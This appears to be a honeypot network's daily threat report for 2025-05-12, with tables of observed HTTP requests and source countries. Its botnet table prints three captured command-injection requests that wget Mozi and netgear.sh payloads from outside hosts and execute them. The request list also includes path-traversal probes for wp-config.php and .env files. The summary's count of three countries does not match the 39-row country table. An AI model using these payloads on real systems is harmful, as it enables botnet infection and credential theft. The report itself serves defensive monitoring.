Daily Report: 2025-05-12#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 42 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1093 requests were recorded during the day, originating from 3 different countries, with a peak of 188 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
CA | Dubai |
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
45.230.66.11 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.11:11906/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
117.205.81.124 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
176.65.148.10 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd+/tmp;rm+-rf+*;wget+http://213.209.143.44/netgear.sh;chmod+777+netgear.sh;sh+netgear.sh;&curpath=/¤tsetting.htm=1; HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
191 | 1 | GET /Odin/http/call1747075626 HTTP/1.1 |
192 | 1 | GET /OdinHttpCall1747075626 HTTP/1.1 |
193 | 1 | GET /odinhttpcall1747075626 HTTP/1.1 |
207 | 1 | GET /qa/test HTTP/1.1 |
208 | 1 | GET /ci/test HTTP/1.1 |
209 | 1 | GET /CP/test HTTP/1.1 |
210 | 1 | GET /ad/test HTTP/1.1 |
211 | 1 | GET /V1/test HTTP/1.1 |
212 | 1 | GET /BU/test HTTP/1.1 |
213 | 1 | GET /js/test HTTP/1.1 |
214 | 1 | GET /st/test HTTP/1.1 |
215 | 1 | GET /Cp/test HTTP/1.1 |
216 | 1 | GET /bu/test HTTP/1.1 |
217 | 1 | GET /a/test HTTP/1.1 |
218 | 1 | GET /s/test HTTP/1.1 |
219 | 1 | GET /m/test HTTP/1.1 |
225 | 1 | GET /run/test HTTP/1.1 |
226 | 1 | GET /log/test HTTP/1.1 |
227 | 1 | GET /tmp/test HTTP/1.1 |
228 | 1 | GET /Lib/test HTTP/1.1 |
229 | 1 | GET /old/test HTTP/1.1 |
230 | 1 | GET /v3/test HTTP/1.1 |
231 | 1 | GET /v2/test HTTP/1.1 |
232 | 1 | GET /v1/test HTTP/1.1 |
233 | 1 | GET /ui/test HTTP/1.1 |
234 | 1 | GET /fm/test HTTP/1.1 |
235 | 1 | GET /cp/test HTTP/1.1 |
236 | 1 | GET /wp/test HTTP/1.1 |
237 | 1 | GET /en/test HTTP/1.1 |
238 | 1 | GET /V2/test HTTP/1.1 |
249 | 1 | GET /Upa7 HTTP/1.1 |
250 | 1 | GET /faHM HTTP/1.1 |
255 | 1 | GET /config/index?time=1747055289750012805 HTTP/1.1 |
285 | 1 | POST /api/user/binLookup?time=1747055490748327575 HTTP/1.1 |
286 | 1 | GET /api/bin/440393?time=1747055490103060994 HTTP/1.1 |
291 | 1 | GET /Odin/http/call1747015081 HTTP/1.1 |
292 | 1 | GET /OdinHttpCall1747015081 HTTP/1.1 |
293 | 1 | GET /odinhttpcall1747015081 HTTP/1.1 |
396 | 1 | GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1 |
397 | 1 | GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1 |
398 | 1 | GET /app/etc/local.xml HTTP/1.1 |
407 | 1 | GET /blog1/.env HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 188 | US |
1 | 127 | BD |
2 | 123 | GB |
3 | 112 | VN |
4 | 81 | DE |
5 | 62 | CH |
6 | 49 | BG |
7 | 47 | PL |
8 | 41 | NL |
9 | 29 | CA |
10 | 26 | AO |
11 | 25 | SC |
12 | 25 | LT |
13 | 17 | SG |
14 | 16 | KR |
15 | 15 | UA |
16 | 12 | AZ |
17 | 12 | IN |
18 | 11 | GH |
19 | 10 | BR |
20 | 9 | CN |
21 | 8 | ES |
22 | 6 | HK |
23 | 6 | RU |
24 | 5 | BE |
25 | 5 | PT |
26 | 4 | LA |
27 | 3 | AR |
28 | 3 | TH |
29 | 2 | VE |
30 | 2 | JP |
31 | 2 | ZM |
32 | 2 | MD |
33 | 2 | RO |
34 | 2 | MC |
35 | 1 | IT |
36 | 1 | FR |
37 | 1 | IL |
38 | 1 | ID |